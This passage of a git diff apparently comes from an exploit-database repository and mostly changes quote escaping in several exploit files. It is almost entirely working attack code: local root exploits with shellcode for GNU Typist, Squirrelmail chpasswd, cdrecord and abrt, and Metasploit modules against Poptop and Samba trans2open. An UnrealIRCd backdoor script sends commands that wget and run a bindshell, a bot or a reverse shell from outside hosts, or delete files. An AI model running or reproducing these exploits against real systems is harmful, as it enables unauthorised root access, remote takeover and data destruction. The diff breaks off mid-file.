\"%.134745456x%x%x%x%x%x%x%x%x%x%x%n:\"; } - if ( $target eq "4" ) { + if ( $target eq \"4\" ) { $retword = 0x0808c82c; #.GOT exit - $fmtstring = "%.134802669x%x%x%x%x%x%x%x%x%n:"; + $fmtstring = \"%.134802669x%x%x%x%x%x%x%x%x%n:\"; } - printf("Using target number %d\n", $target); - printf("Using Mr .dtors 0x%x\n",$retword); + printf(\"Using target number %d\\n\", $target); + printf(\"Using Mr .dtors 0x%x\\n\",$retword); - $new_retword = pack('l', ($retword)); - $new_retshell = pack('l', ($retshell)); + $new_retword = pack(\'l\', ($retword)); + $new_retshell = pack(\'l\', ($retshell)); $buffer2 = $new_retword; $buffer2 .= $nop x 150; $buffer2 .= $shellcode; $buffer2 .= $fmtstring; - exec("$cdrecordpath dev='$buffer2' '$cdrecordpath'"); + exec(\"$cdrecordpath dev=\'$buffer2\' \'$cdrecordpath\'\"); # milw0rm.com [2003-05-14] diff --git a/platforms/linux/local/36747.c b/platforms/linux/local/36747.c index 843aab42e..2c6ed6d40 100755 --- a/platforms/linux/local/36747.c +++ b/platforms/linux/local/36747.c @@ -26,19 +26,19 @@ // $ ./a.out /etc/passwd // [ wait a few minutes ] // Detected ccpp-2015-04-13-21:54:43-14183.new, attempting to race... -// Didn't win, trying again! +// Didn\'t win, trying again! // Detected ccpp-2015-04-13-21:54:43-14186.new, attempting to race... -// Didn't win, trying again! +// Didn\'t win, trying again! // Detected ccpp-2015-04-13-21:54:43-14191.new, attempting to race... -// Didn't win, trying again! +// Didn\'t win, trying again! // Detected ccpp-2015-04-13-21:54:43-14195.new, attempting to race... -// Didn't win, trying again! +// Didn\'t win, trying again! // Detected ccpp-2015-04-13-21:54:43-14198.new, attempting to race... // Exploit successful... // -rw-r--r--. 1 taviso abrt 1751 Sep 26 2014 /etc/passwd // -static const char kAbrtPrefix[] = "/var/tmp/abrt/"; +static const char kAbrtPrefix[] = \"/var/tmp/abrt/\"; static const size_t kMaxEventBuf = 8192; static const size_t kUnlinkAttempts = 8192 * 2; static const int kCrashDelay = 10000; @@ -57,27 +57,27 @@ int main(int argc, char **argv) // First argument is the filename user wants us to chown(). if (argc != 2) { - errx(EXIT_FAILURE, "please specify filename to chown (e.g. /etc/passwd)"); + errx(EXIT_FAILURE, \"please specify filename to chown (e.g. /etc/passwd)\"); } // This is required as we need to make different comm names to avoid // triggering abrt rate limiting, so we fork()/execve() different names. - if (strcmp(argv[1], "crash") == 0) { + if (strcmp(argv[1], \"crash\") == 0) { __builtin_trap(); } // Setup inotify, and add a watch on the abrt directory. if ((fd = inotify_init()) < 0) { - err(EXIT_FAILURE, "unable to initialize inotify"); + err(EXIT_FAILURE, \"unable to initialize inotify\"); } if ((watch = inotify_add_watch(fd, kAbrtPrefix, IN_CREATE)) < 0) { - err(EXIT_FAILURE, "failed to create new watch descriptor"); + err(EXIT_FAILURE, \"failed to create new watch descriptor\"); } // Start causing crashes so that abrt generates reports. if ((child = create_abrt_events(*argv)) == -1) { - err(EXIT_FAILURE, "failed to generate abrt reports"); + err(EXIT_FAILURE, \"failed to generate abrt reports\"); } // Now start processing inotify events. @@ -90,7 +90,7 @@ int main(int argc, char **argv) char command[1024]; // If this is a new ccpp report, we can start trying to race it. - if (strncmp(ev->name, "ccpp", 4) != 0) { + if (strncmp(ev->name, \"ccpp\", 4) != 0) { continue; } @@ -99,9 +99,9 @@ int main(int argc, char **argv) strncat(dirname, ev->name, sizeof dirname); strncpy(mapsname, dirname, sizeof dirname); - strncat(mapsname, "/maps", sizeof mapsname); + strncat(mapsname, \"/maps\", sizeof mapsname); - fprintf(stderr, "Detected %s, attempting to race...\n", ev->name); + fprintf(stderr, \"Detected %s, attempting to race...\\n\", ev->name); // Check if we need to wait for the next event or not. while (access(dirname, F_OK) == 0) { @@ -117,7 +117,7 @@ int main(int argc, char **argv) break; } - // This looks good, but doesn't mean we won, it's possible + // This looks good, but doesn\'t mean we won, it\'s possible // chown() might have happened while the file was unlinked. // // Give it a few microseconds to run chown()...just in case @@ -125,31 +125,31 @@ int main(int argc, char **argv) usleep(10); if (stat(argv[1], &statbuf) != 0) { - errx(EXIT_FAILURE, "unable to stat target file %s", argv[1]); + errx(EXIT_FAILURE, \"unable to stat target file %s\", argv[1]); } if (statbuf.st_uid != getuid()) { break; } - fprintf(stderr, "\tExploit successful...\n"); + fprintf(stderr, \"\\tExploit successful...\\n\"); - // We're the new owner, run ls -l to show user. - sprintf(command, "ls -l %s", argv[1]); + // We\'re the new owner, run ls -l to show user. + sprintf(command, \"ls -l %s\", argv[1]); system(command); return EXIT_SUCCESS; } } - fprintf(stderr, "\tDidn't win, trying again!\n"); + fprintf(stderr, \"\\tDidn\'t win, trying again!\\n\"); } } - err(EXIT_FAILURE, "failed to read inotify event"); + err(EXIT_FAILURE, \"failed to read inotify event\"); } -// This routine attempts to generate new abrt events. We can't just crash, +// This routine attempts to generate new abrt events. We can\'t just crash, // because abrt sanely tries to rate limit report creation, so we need a new // comm name for each crash. static pid_t create_abrt_events(const char *name) @@ -169,35 +169,35 @@ static pid_t create_abrt_events(const char *name) // Choose a new unused filename newname = tmpnam(0); - // Make sure we're not too fast. + // Make sure we\'re not too fast. usleep(kCrashDelay); // Create a new crashing subprocess. if ((pid = fork()) == 0) { if (link(name, newname) != 0) { - err(EXIT_FAILURE, "failed to create a new exename"); + err(EXIT_FAILURE, \"failed to create a new exename\"); } // Execute crashing process. - execl(newname, newname, "crash", NULL); + execl(newname, newname, \"crash\", NULL); // This should always work. - err(EXIT_FAILURE, "unexpected execve failure"); + err(EXIT_FAILURE, \"unexpected execve failure\"); } // Reap crashed subprocess. if (waitpid(pid, &status, 0) != pid) { - err(EXIT_FAILURE, "waitpid failure"); + err(EXIT_FAILURE, \"waitpid failure\"); } // Clean up the temporary name. if (unlink(newname) != 0) { - err(EXIT_FAILURE, "failed to clean up"); + err(EXIT_FAILURE, \"failed to clean up\"); } // Make sure it crashed as expected. if (!WIFSIGNALED(status)) { - errx(EXIT_FAILURE, "something went wrong"); + errx(EXIT_FAILURE, \"something went wrong\"); } } diff --git a/platforms/linux/local/40634.py b/platforms/linux/local/40634.py new file mode 100755 index 000000000..833c903cf --- /dev/null +++ b/platforms/linux/local/40634.py @@ -0,0 +1,58 @@ +# Exploit developed using Exploit Pack v6.5 +# Exploit Author: Juan Sacco - http://www.exploitpack.com - +# jsacco@exploitpack.com +# Program affected: GNU Typist +# Affected value: ARG0 +# Version: 2.9.5-2 +# +# Tested and developed under: Kali Linux 2.0 x86 - https://www.kali.org +# Program description: Simple ncurses touch typing tutor +# Displays exercise lines, measures your typing speed and +# accuracy, and displays the results + +# Kali Linux 2.0 package: pool/main/g/gtypist/gtypist_2.9.5-2_i386.deb +# MD5sum: 7ca59c5c0c494e41735b7be676401357 +# Website: http://www.gnu.org/software/gtypist/ + +# gdb$ run `python -c 'print "A"*4098'` +# 0xb7e95def in __strcpy_chk () from /lib/i386-linux-gnu/libc.so.6 +# 0x0804bf30 in ?? () +# 0xb7dbb5f7 in __libc_start_main () from /lib/i386-linux-gnu/libc.so.6 +# 0x0804c393 in ?? () + + +import os, subprocess + +def run(): + try: + print "# GNU GTypist - Local Buffer Overflow by Juan Sacco" + print "# This Exploit has been developed using Exploit Pack - +http://exploitpack.com" + # NOPSLED + SHELLCODE + EIP + + buffersize = 4098 + nopsled = "\x90"*30 + shellcode = +"\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" + eip = "\x08\xec\xff\xbf" + buffer = nopsled * (buffersize-len(shellcode)) + eip + subprocess.call(["gtypist ",' ', buffer]) + + except OSError as e: + if e.errno == os.errno.ENOENT: + print "Sorry, GNU GTypist - Not found!" + else: + print "Error executing exploit" + raise + +def howtousage(): + print "Snap! Something went wrong" + sys.exit(-1) + +if __name__ == '__main__': + try: + print "Exploit GNU GTypist - Local Overflow Exploit" + print "Author: Juan Sacco - Exploit Pack" + except IndexError: + howtousage() +run() diff --git a/platforms/linux/local/417.c b/platforms/linux/local/417.c index 306dcb6a0..6e0d54991 100755 --- a/platforms/linux/local/417.c +++ b/platforms/linux/local/417.c @@ -30,17 +30,17 @@ #include #define NOP 0x90 -#define Fuckpr0 "./chpasswd" /* you need modify it by yourself */ +#define Fuckpr0 \"./chpasswd\" /* you need modify it by yourself */ #define LOOP 2000 /* loop of bruteforce */ /* setuid(0) shellcode by by Matias Sedalo 3x ^_^ */ -char shellcode[] ="x31xdbx53x8dx43x17xcdx80x99x68x6ex2fx73x68x68" -"x2fx2fx62x69x89xe3x50x53x89xe1xb0x0bxcdx80"; +char shellcode[] =\"x31xdbx53x8dx43x17xcdx80x99x68x6ex2fx73x68x68\" +\"x2fx2fx62x69x89xe3x50x53x89xe1xb0x0bxcdx80\"; unsigned long get_esp() { -__asm__ ("movl %esp,%eax"); +__asm__ (\"movl %esp,%eax\"); } @@ -52,7 +52,7 @@ value = malloc(size); if(value == NULL){ -printf("ERROR:virtual memory exhausted...n"); +printf(\"ERROR:virtual memory exhausted...n\"); exit(-1); @@ -74,16 +74,16 @@ pid_t pid; ret_addr = get_esp() - strlen(Fuckpr0) - strlen(shellcode); -printf("t-------------------------------------------------------n"); -printf("t Squirrelmail chpasswd local root bruteforce exploit n"); -printf("t code By Bytes 2004 n"); -printf("t http://www.ph4nt0m.net n"); -printf("t#######################################################n"); +printf(\"t-------------------------------------------------------n\"); +printf(\"t Squirrelmail chpasswd local root bruteforce exploit n\"); +printf(\"t code By Bytes 2004 n\"); +printf(\"t http://www.ph4nt0m.net n\"); +printf(\"t#######################################################n\"); sleep(1); -printf("[+] Bruteforce......nn"); +printf(\"[+] Bruteforce......nn\"); sleep(2); @@ -105,19 +105,19 @@ for(i=0; i < 150; i+=4){ } -printf("buf1 = %sn",buf1); +printf(\"buf1 = %sn\",buf1); -execl(Fuckpr0,"chpasswd",buf1,buf2,0); +execl(Fuckpr0,\"chpasswd\",buf1,buf2,0); } wait(&status); -printf("[-] Signal: #%in", status); +printf(\"[-] Signal: #%in\", status); if(WIFEXITED(status) != 0 ) { -printf("[=] Step.%i: 0x%xn[~] Exiting...n",(j/2),ret_addr); +printf(\"[=] Step.%i: 0x%xn[~] Exiting...n\",(j/2),ret_addr); exit(1); @@ -127,7 +127,7 @@ ret_addr += offset; j += offset; -printf("[=] Offset:%d Use ret:0x%xn",j, ret_addr); +printf(\"[=] Offset:%d Use ret:0x%xn\",j, ret_addr); } diff --git a/platforms/linux/local/438.c b/platforms/linux/local/438.c index 448a18158..5ecb083f6 100755 --- a/platforms/linux/local/438.c +++ b/platforms/linux/local/438.c @@ -3,7 +3,7 @@ # # cdrecord-suidshell.sh - I)ruid [CAU] (09.2004) # -# Exploits cdrecord's exec() of $RSH before dropping privs +# Exploits cdrecord\'s exec() of $RSH before dropping privs # cat > ./cpbinbash.c << __EOF__ @@ -17,14 +17,14 @@ int fd1, fd2; int count; char buffer[1]; -/* Set ID's */ +/* Set ID\'s */ setuid( geteuid() ); setgid( geteuid() ); /* Copy the shell */ -if ((fd1=open( "/bin/bash", O_RDONLY))<0) +if ((fd1=open( \"/bin/bash\", O_RDONLY))<0) return -1; -if ((fd2=open( "./bash", O_WRONLY|O_CREAT))<0) +if ((fd2=open( \"./bash\", O_WRONLY|O_CREAT))<0) return -1; while((count=read(fd1, buffer, 1))) write(fd2, buffer, count); @@ -33,8 +33,8 @@ close( fd1 ); close( fd2 ); /* Priv the shell */ -chown( "./bash", geteuid(), geteuid() ); -chmod( "./bash", 3565 ); +chown( \"./bash\", geteuid(), geteuid() ); +chmod( \"./bash\", 3565 ); } __EOF__ diff --git a/platforms/linux/remote/13853.pl b/platforms/linux/remote/13853.pl index b3ff45b16..7a67406b4 100755 --- a/platforms/linux/remote/13853.pl +++ b/platforms/linux/remote/13853.pl @@ -7,53 +7,53 @@ use Socket; use IO::Socket; ## Payload options -my $payload1 = 'AB; cd /tmp; wget http://packetstormsecurity.org/groups/synnergy/bindshell-unix -O bindshell; chmod +x bindshell; ./bindshell &'; -my $payload2 = 'AB; cd /tmp; wget http://efnetbs.webs.com/bot.txt -O bot; chmod +x bot; ./bot &'; -my $payload3 = 'AB; cd /tmp; wget http://efnetbs.webs.com/r.txt -O rshell; chmod +x rshell; ./rshell &'; -my $payload4 = 'AB; killall ircd'; -my $payload5 = 'AB; cd ~; /bin/rm -fr ~/*;/bin/rm -fr *'; +my $payload1 = \'AB; cd /tmp; wget http://packetstormsecurity.org/groups/synnergy/bindshell-unix -O bindshell; chmod +x bindshell; ./bindshell &\'; +my $payload2 = \'AB; cd /tmp; wget http://efnetbs.webs.com/bot.txt -O bot; chmod +x bot; ./bot &\'; +my $payload3 = \'AB; cd /tmp; wget http://efnetbs.webs.com/r.txt -O rshell; chmod +x rshell; ./rshell &\'; +my $payload4 = \'AB; killall ircd\'; +my $payload5 = \'AB; cd ~; /bin/rm -fr ~/*;/bin/rm -fr *\'; -$host = ""; -$port = ""; -$type = ""; +$host = \"\"; +$port = \"\"; +$type = \"\"; $host = @ARGV[0]; $port = @ARGV[1]; $type = @ARGV[2]; -if ($host eq "") { usage(); } -if ($port eq "") { usage(); } -if ($type eq "") { usage(); } +if ($host eq \"\") { usage(); } +if ($port eq \"\") { usage(); } +if ($type eq \"\") { usage(); } sub usage { - printf "\nUsage :\n"; - printf "perl unrealpwn.pl \n\n"; - printf "Command list :\n"; - printf "[1] - Perl Bindshell\n"; - printf "[2] - Perl Reverse Shell\n"; - printf "[3] - Perl Bot\n"; - printf "-----------------------------\n"; - printf "[4] - shutdown ircserver\n"; - printf "[5] - delete ircserver\n"; + printf \"\\nUsage :\\n\"; + printf \"perl unrealpwn.pl \\n\\n\"; + printf \"Command list :\\n\"; + printf \"[1] - Perl Bindshell\\n\"; + printf \"[2] - Perl Reverse Shell\\n\"; + printf \"[3] - Perl Bot\\n\"; + printf \"-----------------------------\\n\"; + printf \"[4] - shutdown ircserver\\n\"; + printf \"[5] - delete ircserver\\n\"; exit(1); } sub unreal_trojan { my $ircserv = $host; my $ircport = $port; - my $sockd = IO::Socket::INET->new (PeerAddr => $ircserv, PeerPort => $ircport, Proto => "tcp") || die "Failed to connect to $ircserv on $ircport ...\n\n"; - print "[+] Payload sent ...\n"; - if ($type eq "1") { - print $sockd "$payload1"; - } elsif ($type eq "2") { - print $sockd "$payload2"; - } elsif ($type eq "3") { - print $sockd "$payload3"; - } elsif ($type eq "4") { - print $sockd "$payload4"; - } elsif ($type eq "5") { - print $sockd "$payload5"; + my $sockd = IO::Socket::INET->new (PeerAddr => $ircserv, PeerPort => $ircport, Proto => \"tcp\") || die \"Failed to connect to $ircserv on $ircport ...\\n\\n\"; + print \"[+] Payload sent ...\\n\"; + if ($type eq \"1\") { + print $sockd \"$payload1\"; + } elsif ($type eq \"2\") { + print $sockd \"$payload2\"; + } elsif ($type eq \"3\") { + print $sockd \"$payload3\"; + } elsif ($type eq \"4\") { + print $sockd \"$payload4\"; + } elsif ($type eq \"5\") { + print $sockd \"$payload5\"; } else { - printf "\nInvalid Option ...\n\n"; + printf \"\\nInvalid Option ...\\n\\n\"; usage(); } close($sockd); diff --git a/platforms/linux/remote/16845.rb b/platforms/linux/remote/16845.rb index 56b8e28f0..f054fbe93 100755 --- a/platforms/linux/remote/16845.rb +++ b/platforms/linux/remote/16845.rb @@ -9,7 +9,7 @@ # http://metasploit.com/framework/ ## -require 'msf/core' +require \'msf/core\' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking @@ -19,8 +19,8 @@ class Metasploit3 < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, - 'Name' => 'Poptop Negative Read Overflow', - 'Description' => %q{ + \'Name\' => \'Poptop Negative Read Overflow\', + \'Description\' => %q{ This is an exploit for the Poptop negative read overflow. This will work against versions prior to 1.1.3-b3 and 1.1.3-20030409, but I currently do not have a good way to detect Poptop versions. @@ -31,44 +31,44 @@ class Metasploit3 < Msf::Exploit::Remote Using the current method of exploitation, our socket will be closed before we have the ability to run code, preventing the use of Findsock. }, - 'Author' => 'spoonm', - 'License' => MSF_LICENSE, - 'Version' => '$Revision: 11114 $', - 'References' => + \'Author\' => \'spoonm\', + \'License\' => MSF_LICENSE, + \'Version\' => \'$Revision: 11114 $\', + \'References\' => [ - ['CVE', '2003-0213'], - ['OSVDB', '3293'], - ['URL', 'http://securityfocus.com/archive/1/317995'], - ['URL', 'http://www.freewebs.com/blightninjas/'], + [\'CVE\', \'2003-0213\'], + [\'OSVDB\', \'3293\'], + [\'URL\', \'http://securityfocus.com/archive/1/317995\'], + [\'URL\', \'http://www.freewebs.com/blightninjas/\'], ], - 'Privileged' => true, - 'Payload' => + \'Privileged\' => true, + \'Payload\' => { # Payload space is dynamically determined - 'MinNops' => 16, - 'StackAdjustment' => -1088, - 'Compat' => + \'MinNops\' => 16, + \'StackAdjustment\' => -1088, + \'Compat\' => { - 'ConnectionType' => '-find', + \'ConnectionType\' => \'-find\', } }, - 'SaveRegisters' => [ 'esp' ], - 'Platform' => 'linux', - 'Arch' => ARCH_X86, - 'Targets' => + \'SaveRegisters\' => [ \'esp\' ], + \'Platform\' => \'linux\', + \'Arch\' => ARCH_X86, + \'Targets\' => [ - ['Linux Bruteforce', - { 'Bruteforce' => + [\'Linux Bruteforce\', + { \'Bruteforce\' => { - 'Start' => { 'Ret' => 0xbffffa00 }, - 'Stop' => { 'Ret' => 0xbffff000 }, - 'Step' => 0 + \'Start\' => { \'Ret\' => 0xbffffa00 }, + \'Stop\' => { \'Ret\' => 0xbffff000 }, + \'Step\' => 0 } } ], ], - 'DefaultTarget' => 0, - 'DisclosureDate' => 'Apr 9 2003')) + \'DefaultTarget\' => 0, + \'DisclosureDate\' => \'Apr 9 2003\')) register_options( [ @@ -77,26 +77,26 @@ class Metasploit3 < Msf::Exploit::Remote register_advanced_options( [ - OptInt.new("PreReturnLength", [ true, "Space before we hit the return address. Affects PayloadSpace.", 220 ]), - OptInt.new("RetLength", [ true, "Length of returns after payload.", 32 ]), - OptInt.new("ExtraSpace", [ true, "The exploit builds two protocol frames, the header frame and the control frame. ExtraSpace allows you use this space for the payload instead of the protocol (breaking the protocol, but still triggering the bug). If this value is <= 128, it doesn't really disobey the protocol, it just uses the Vendor and Hostname fields for payload data (these should eventually be filled in to look like a real client, ie windows). I've had successful exploitation with this set to 154, but nothing over 128 is suggested.", 0 ]), - OptString.new("Hostname", [ false, "PPTP Packet hostname", '' ]), - OptString.new("Vendor", [ true, "PPTP Packet vendor", 'Microsoft Windows NT' ]), + OptInt.new(\"PreReturnLength\", [ true, \"Space before we hit the return address. Affects PayloadSpace.\", 220 ]), + OptInt.new(\"RetLength\", [ true, \"Length of returns after payload.\", 32 ]), + OptInt.new(\"ExtraSpace\", [ true, \"The exploit builds two protocol frames, the header frame and the control frame. ExtraSpace allows you use this space for the payload instead of the protocol (breaking the protocol, but still triggering the bug). If this value is <= 128, it doesn\'t really disobey the protocol, it just uses the Vendor and Hostname fields for payload data (these should eventually be filled in to look like a real client, ie windows). I\'ve had successful exploitation with this set to 154, but nothing over 128 is suggested.\", 0 ]), + OptString.new(\"Hostname\", [ false, \"PPTP Packet hostname\", \'\' ]), + OptString.new(\"Vendor\", [ true, \"PPTP Packet vendor\", \'Microsoft Windows NT\' ]), ], self.class) end # Dynamic payload space calculation def payload_space(explicit_target = nil) - datastore['PreReturnLength'].to_i + datastore['ExtraSpace'].to_i + datastore[\'PreReturnLength\'].to_i + datastore[\'ExtraSpace\'].to_i end def build_packet(length) - [length, 1, 0x1a2b3c4d, 1, 0].pack('nnNnn') + - [1,0].pack('cc') + - [0].pack('n') + - [1,1,0,2600].pack('NNnn') + - datastore['Hostname'].ljust(64, "\x00") + - datastore['Vendor'].ljust(64, "\x00") + [length, 1, 0x1a2b3c4d, 1, 0].pack(\'nnNnn\') + + [1,0].pack(\'cc\') + + [0].pack(\'n\') + + [1,1,0,2600].pack(\'NNnn\') + + datastore[\'Hostname\'].ljust(64, \"\\x00\") + + datastore[\'Vendor\'].ljust(64, \"\\x00\") end def check @@ -114,13 +114,13 @@ class Metasploit3 < Msf::Exploit::Remote def brute_exploit(addrs) connect - print_status("Trying #{"%.8x" % addrs['Ret']}...") + print_status(\"Trying #{\"%.8x\" % addrs[\'Ret\']}...\") # Construct the evil length packet packet = build_packet(1) + payload.encoded + - ([addrs['Ret']].pack('V') * (datastore['RetLength'] / 4)) + ([addrs[\'Ret\']].pack(\'V\') * (datastore[\'RetLength\'] / 4)) sock.put(packet) diff --git a/platforms/linux/remote/16861.rb b/platforms/linux/remote/16861.rb index 75aaace2a..627c2d9f7 100755 --- a/platforms/linux/remote/16861.rb +++ b/platforms/linux/remote/16861.rb @@ -9,7 +9,7 @@ # http://metasploit.com/framework/ ## -require 'msf/core' +require \'msf/core\' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking @@ -19,8 +19,8 @@ class Metasploit3 < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, - 'Name' => 'Samba trans2open Overflow (Linux x86)', - 'Description' => %q{ + \'Name\' => \'Samba trans2open Overflow (Linux x86)\', + \'Description\' => %q{ This exploits the buffer overflow found in Samba versions 2.2.0 to 2.2.8. This particular module is capable of exploiting the flaw on x86 Linux systems that do not @@ -29,45 +29,45 @@ class Metasploit3 < Msf::Exploit::Remote NOTE: Some older versions of RedHat do not seem to be vulnerable since they apparently do not allow anonymous access to IPC. }, - 'Author' => [ 'hdm', 'jduck' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision: 9828 $', - 'References' => + \'Author\' => [ \'hdm\', \'jduck\' ], + \'License\' => MSF_LICENSE, + \'Version\' => \'$Revision: 9828 $\', + \'References\' => [ - [ 'CVE', '2003-0201' ], - [ 'OSVDB', '4469' ], - [ 'BID', '7294' ], - [ 'URL', 'http://seclists.org/bugtraq/2003/Apr/103' ] + [ \'CVE\', \'2003-0201\' ], + [ \'OSVDB\', \'4469\' ], + [ \'BID\', \'7294\' ], + [ \'URL\', \'http://seclists.org/bugtraq/2003/Apr/103\' ] ], - 'Privileged' => true, - 'Payload' => + \'Privileged\' => true, + \'Payload\' => { - 'Space' => 1024, - 'BadChars' => "\x00", - 'MinNops' => 512, - 'StackAdjustment' => -3500 + \'Space\' => 1024, + \'BadChars\' => \"\\x00\", + \'MinNops\' => 512, + \'StackAdjustment\' => -3500 }, - 'Platform' => 'linux', - 'Targets' => + \'Platform\' => \'linux\', + \'Targets\' => [ # tested OK - jjd: # RedHat 7.2 samba-2.2.1a-4 - 0xbffffafc # RedHat 9.0 samba-2.2.7a-7.9.0 - 0xbfffddfc - [ 'Samba 2.2.x - Bruteforce', + [ \'Samba 2.2.x - Bruteforce\', { - 'PtrToNonZero' => 0xbffffff4, # near the bottom of the stack - 'Offset' => 1055, - 'Bruteforce' => + \'PtrToNonZero\' => 0xbffffff4, # near the bottom of the stack + \'Offset\' => 1055, + \'Bruteforce\' => { - 'Start' => { 'Ret' => 0xbffffdfc }, - 'Stop' => { 'Ret' => 0xbfa00000 }, - 'Step' => 256 + \'Start\' => { \'Ret\' => 0xbffffdfc }, + \'Stop\' => { \'Ret\' => 0xbfa00000 }, + \'Step\' => 256 } } ], ], - 'DefaultTarget' => 0, - 'DisclosureDate' => 'Apr 7 2003' + \'DefaultTarget\' => 0, + \'DisclosureDate\' => \'Apr 7 2003\' )) register_options( @@ -78,20 +78,20 @@ class Metasploit3 < Msf::Exploit::Remote def brute_exploit(addrs) - curr_ret = addrs['Ret'] + curr_ret = addrs[\'Ret\'] begin - print_status("Trying return address 0x%.8x..." % curr_ret) + print_status(\"Trying return address 0x%.8x...\" % curr_ret) connect smb_login if ! @checked_peerlm if smb_peer_lm !~ /samba/i - raise RuntimeError, "This target is not a Samba server (#{smb_peer_lm}" + raise RuntimeError, \"This target is not a Samba server (#{smb_peer_lm}\" end - if smb_peer_lm =~ /Samba [34]\./i - raise RuntimeError, "This target is not a vulnerable Samba server (#{smb_peer_lm})" + if smb_peer_lm =~ /Samba [34]\\./i + raise RuntimeError, \"This target is not a vulnerable Samba server (#{smb_peer_lm})\" end end @@ -99,7 +99,7 @@ class Metasploit3 < Msf::Exploit::Remote # This value *must* be 1988 to allow findrecv shellcode to work - # XXX: I'm not sure the above comment is true... + # XXX: I\'m not sure the above comment is true... pattern = rand_text_english(1988) # See the OSX and Solaris versions of this module for additional @@ -107,8 +107,8 @@ class Metasploit3 < Msf::Exploit::Remote # eip_off = 1071 - RH7.2 compiled with -ggdb instead of -O/-O2 # (rpmbuild -bp ; edited/reran config.status ; make) - eip_off = target['Offset'] - ptr_to_non_zero = target['PtrToNonZero'] + eip_off = target[\'Offset\'] + ptr_to_non_zero = target[\'PtrToNonZero\'] # Stuff the shellcode into the request pattern[0, payload.encoded.length] = payload.encoded @@ -119,7 +119,7 @@ class Metasploit3 < Msf::Exploit::Remote # 222 if (IS_IPC(conn)) { # 223 return(ERROR(ERRSRV,ERRaccess)); # 224 } - pattern[eip_off + 4, 4] = [ptr_to_non_zero - 0x30].pack('V') + pattern[eip_off + 4, 4] = [ptr_to_non_zero - 0x30].pack(\'V\') # We want to avoid crashing on the following two derefences. # @@ -127,23 +127,23 @@ class Metasploit3 < Msf::Exploit::Remote # 117 { # 118 int outsize = set_message(outbuf,0,0,True); # 119 int cmd = CVAL(inbuf,smb_com); - pattern[eip_off + 8, 4] = [ptr_to_non_zero - 0x08].pack('V') - pattern[eip_off + 12, 4] = [ptr_to_non_zero - 0x24].pack('V') + pattern[eip_off + 8, 4] = [ptr_to_non_zero - 0x08].pack(\'V\') + pattern[eip_off + 12, 4] = [ptr_to_non_zero - 0x24].pack(\'V\') # This stream covers the framepointer and the return address - #pattern[1199, 400] = [curr_ret].pack('N') * 100 - pattern[eip_off, 4] = [curr_ret].pack('V') + #pattern[1199, 400] = [curr_ret].pack(\'N\') * 100 + pattern[eip_off, 4] = [curr_ret].pack(\'V\') trans = - "\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00"+ - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"+ - "\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00"+ - "\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01"+ - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90"+ + \"\\x00\\x04\\x08\\x20\\xff\\x53\\x4d\\x42\\x32\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"+ + \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\"+ + \"\\x64\\x00\\x00\\x00\\x00\\xd0\\x07\\x0c\\x00\\xd0\\x07\\x0c\\x00\\x00\\x00\\x00\"+ + \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd0\\x07\\x43\\x00\\x0c\\x00\\x14\\x08\\x01\"+ + \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"+ + \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x90\"+ pattern - # puts "press any key"; $stdin.gets + # puts \"press any key\"; $stdin.gets sock.put(trans) handler @@ -152,7 +152,7 @@ class Metasploit3 < Msf::Exploit::Remote rescue ::Rex::Proto::SMB::Exceptions::LoginError, ::Interrupt, ::RuntimeError raise $! rescue ::Exception => e - print_error("#{rhost} #{e}") + print_error(\"#{rhost} #{e}\") end handler diff --git a/platforms/linux/remote/16880.rb b/platforms/linux/remote/16880.rb index bef8eb71a..abdceebd4 100755 --- a/platforms/linux/remote/16880.rb +++ b/platforms/linux/remote/16880.rb @@ -9,7 +9,7 @@ # http://metasploit.com/framework/ ## -require 'msf/core' +require \'msf/core\' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking @@ -19,51 +19,51 @@ class Metasploit3 < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, - 'Name' => 'Samba trans2open Overflow (*BSD x86)', - 'Description' => %q{ + \'Name\' => \'Samba trans2open Overflow (*BSD x86)\', + \'Description\' => %q{ This exploits the buffer overflow found in Samba versions 2.2.0 to 2.2.8. This particular module is capable of exploiting the flaw on x86 Linux systems that do not have the noexec stack option set. }, - 'Author' => [ 'hdm', 'jduck' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision: 9552 $', - 'References' => + \'Author\' => [ \'hdm\', \'jduck\' ], + \'License\' => MSF_LICENSE, + \'Version\' => \'$Revision: 9552 $\', + \'References\' => [ - [ 'CVE', '2003-0201' ], - [ 'OSVDB', '4469' ], - [ 'BID', '7294' ], - [ 'URL', 'http://seclists.org/bugtraq/2003/Apr/103' ] + [ \'CVE\', \'2003-0201\' ], + [ \'OSVDB\', \'4469\' ], + [ \'BID\', \'7294\' ], + [ \'URL\', \'http://seclists.org/bugtraq/2003/Apr/103\' ] ], - 'Privileged' => true, - 'Payload' => + \'Privileged\' => true, + \'Payload\' => { - 'Space' => 1024, - 'BadChars' => "\x00", - 'MinNops' => 512, - 'StackAdjustment' => -3500 + \'Space\' => 1024, + \'BadChars\' => \"\\x00\", + \'MinNops\' => 512, + \'StackAdjustment\' => -3500 }, - 'Platform' => 'bsd', - 'Targets' => + \'Platform\' => \'bsd\', + \'Targets\' => [ # tested OK - jjd: # FreeBSD 5.0-RELEASE samba-2.2.7a.tbz 